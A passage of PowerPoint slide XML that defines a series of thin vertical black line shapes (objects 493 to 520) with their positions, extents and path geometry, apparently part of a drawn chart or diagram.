                  <a:pt x="414" y="422571"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="493" name="object 493"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7448749" y="4867617"/>
            <a:ext cx="0" cy="822960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="415289">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="415103"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="494" name="object 494"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7448477" y="4865656"/>
            <a:ext cx="1258" cy="825475"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="416560">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="416098"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="495" name="object 495"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7476655" y="4876714"/>
            <a:ext cx="0" cy="814152"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="410844">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="410518"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="496" name="object 496"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7476383" y="4875619"/>
            <a:ext cx="3775" cy="815410"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1904" h="411480">
                <a:moveTo>
                  <a:pt x="687" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="687" y="411071"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="497" name="object 497"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7504561" y="4937877"/>
            <a:ext cx="0" cy="752492"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="379730">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="379648"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="498" name="object 498"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7503741" y="4938380"/>
            <a:ext cx="1258" cy="752492"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="379730">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="379399"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="499" name="object 499"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7532415" y="4932516"/>
            <a:ext cx="0" cy="758784"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="382905">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="382354"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="500" name="object 500"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7532141" y="4930293"/>
            <a:ext cx="2517" cy="760043"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="383539">
                <a:moveTo>
                  <a:pt x="414" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="414" y="383480"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="501" name="object 501"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7560320" y="4991502"/>
            <a:ext cx="0" cy="699642"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="353060">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="352587"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="502" name="object 502"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7558406" y="4992007"/>
            <a:ext cx="2517" cy="698383"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="352425">
                <a:moveTo>
                  <a:pt x="414" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="414" y="352338"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="503" name="object 503"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7587679" y="4989326"/>
            <a:ext cx="0" cy="700900"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="353694">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="353691"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="504" name="object 504"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7587407" y="4990953"/>
            <a:ext cx="1258" cy="699642"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="353060">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="352869"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="505" name="object 505"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7615531" y="5034401"/>
            <a:ext cx="0" cy="656858"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="331469">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="330939"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="506" name="object 506"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7612792" y="5034905"/>
            <a:ext cx="2517" cy="655600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="330835">
                <a:moveTo>
                  <a:pt x="622" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="622" y="330690"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="507" name="object 507"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7643439" y="5036536"/>
            <a:ext cx="0" cy="654341"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="330200">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="329862"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="508" name="object 508"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7642865" y="5035957"/>
            <a:ext cx="1258" cy="654341"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="330200">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="330160"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="509" name="object 509"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7671291" y="5101936"/>
            <a:ext cx="0" cy="588907"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="297180">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="296864"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="510" name="object 510"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7671017" y="5100843"/>
            <a:ext cx="2517" cy="590166"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="297814">
                <a:moveTo>
                  <a:pt x="487" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="487" y="297416"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="511" name="object 511"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7699196" y="5096069"/>
            <a:ext cx="0" cy="595199"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="300355">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="299819"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="512" name="object 512"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7697540" y="5097958"/>
            <a:ext cx="2517" cy="592682"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="299085">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="298872"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="513" name="object 513"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7727104" y="5185602"/>
            <a:ext cx="0" cy="504598"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="254635">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="254644"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="514" name="object 514"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7726832" y="5185602"/>
            <a:ext cx="1258" cy="504598"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="254635">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="254644"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="515" name="object 515"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7754954" y="5182920"/>
            <a:ext cx="0" cy="508373"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="256539">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="255997"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="516" name="object 516"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7752215" y="5184259"/>
            <a:ext cx="2517" cy="507113"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="255905">
                <a:moveTo>
                  <a:pt x="0" y="255045"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="255045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1244" y="255321"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="517" name="object 517"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7782862" y="5269267"/>
            <a:ext cx="0" cy="421547"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="212725">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="212425"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="518" name="object 518"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7782288" y="5270305"/>
            <a:ext cx="1258" cy="420288"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="212089">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="211900"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="519" name="object 519"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7810714" y="5256944"/>
            <a:ext cx="0" cy="434130"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="219075">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="218638"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="520" name="object 520"/>
